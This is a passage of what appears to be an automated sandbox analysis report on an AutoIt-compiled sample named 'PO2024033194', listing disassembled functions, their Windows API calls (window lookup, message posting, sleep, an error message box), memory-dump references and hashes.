                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                  Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D